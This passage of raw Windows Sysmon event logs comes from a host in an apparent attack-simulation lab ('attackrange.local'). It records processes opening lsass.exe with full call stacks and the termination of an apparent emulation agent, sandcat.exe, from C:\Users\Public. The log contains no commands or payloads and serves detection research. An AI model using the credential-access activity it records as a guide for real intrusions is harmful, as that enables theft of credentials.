13:34:14.835{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001200Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:14.835{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001199Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:14.835{59A5CD1D-8E44-6005-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001198Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:14.835{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001197Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:14.834{59A5CD1D-8E44-6005-0B00-00000000A301}856988C:\Windows\system32\lsass.exe{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001196Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:14.834{59A5CD1D-8E44-6005-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001195Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:14.834{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x80000000000000001194Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:14.834{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001193Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:14.834{59A5CD1D-8E44-6005-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x80000000000000001192Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:14.828{59A5CD1D-8E44-6005-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{59A5CD1D-8E56-6005-2800-00000000A301}2696C:\Windows\System32\spoolsv.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001191Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:14.828{59A5CD1D-8E44-6005-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{59A5CD1D-8E56-6005-2800-00000000A301}2696C:\Windows\System32\spoolsv.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x80000000000000001190Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:14.821{59A5CD1D-8E44-6005-0A00-00000000A301}848924C:\Windows\system32\services.exe{59A5CD1D-8E56-6005-2800-00000000A301}2696C:\Windows\System32\spoolsv.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\services.exe+1713f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001189Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:14.812{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-8E56-6005-2800-00000000A301}2696C:\Windows\System32\spoolsv.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001188Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:14.812{59A5CD1D-8E44-6005-0A00-00000000A301}8481100C:\Windows\system32\services.exe{59A5CD1D-8E56-6005-2800-00000000A301}2696C:\Windows\System32\spoolsv.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+307d|C:\Windows\system32\services.exe+6334|C:\Windows\system32\services.exe+dc24|C:\Windows\system32\services.exe+d3ee|C:\Windows\system32\services.exe+220e1|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000001187Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:14.799{59A5CD1D-8E56-6005-2800-00000000A301}2696C:\Windows\System32\spoolsv.exe10.0.14393.4169 (rs1_release.210107-1130)Spooler SubSystem AppMicrosoft® Windows® Operating SystemMicrosoft Corporationspoolsv.exeC:\Windows\System32\spoolsv.exeC:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=87E844BD124333302C9DCF947D98B3A3,SHA256=4C3316B6F7671B2E859B2BC98702C7973FB9BC7A6EA71EDB6ACDFE2CF23EB7A0,IMPHASH=A40033EBEE6E37CE4B1D96B817E1BCC7{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\System32\services.exeC:\Windows\system32\services.exe 10341000x80000000000000001186Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:14.794{59A5CD1D-8E44-6005-0B00-00000000A301}856988C:\Windows\system32\lsass.exe{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001185Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:14.793{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x80000000000000001184Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:14.793{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001183Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:14.793{59A5CD1D-8E44-6005-0B00-00000000A301}856988C:\Windows\system32\lsass.exe{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
534500x80000000000000001182Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:14.776{59A5CD1D-8E4D-6005-2500-00000000A301}2988C:\Users\Public\sandcat.exe 10341000x80000000000000001181Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:09.533{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001180Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:09.533{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001179Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:08.252{59A5CD1D-8E44-6005-0B00-00000000A301}856588C:\Windows\system32\lsass.exe{59A5CD1D-8E50-6005-2600-00000000A301}3040C:\Windows\System32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001178Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:08.252{59A5CD1D-8E44-6005-0B00-00000000A301}856588C:\Windows\system32\lsass.exe{59A5CD1D-8E50-6005-2600-00000000A301}3040C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001177Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:08.252{59A5CD1D-8E44-6005-0B00-00000000A301}856588C:\Windows\system32\lsass.exe{59A5CD1D-8E50-6005-2600-00000000A301}3040C:\Windows\System32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001176Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:08.252{59A5CD1D-8E44-6005-0B00-00000000A301}856588C:\Windows\system32\lsass.exe{59A5CD1D-8E50-6005-2600-00000000A301}3040C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.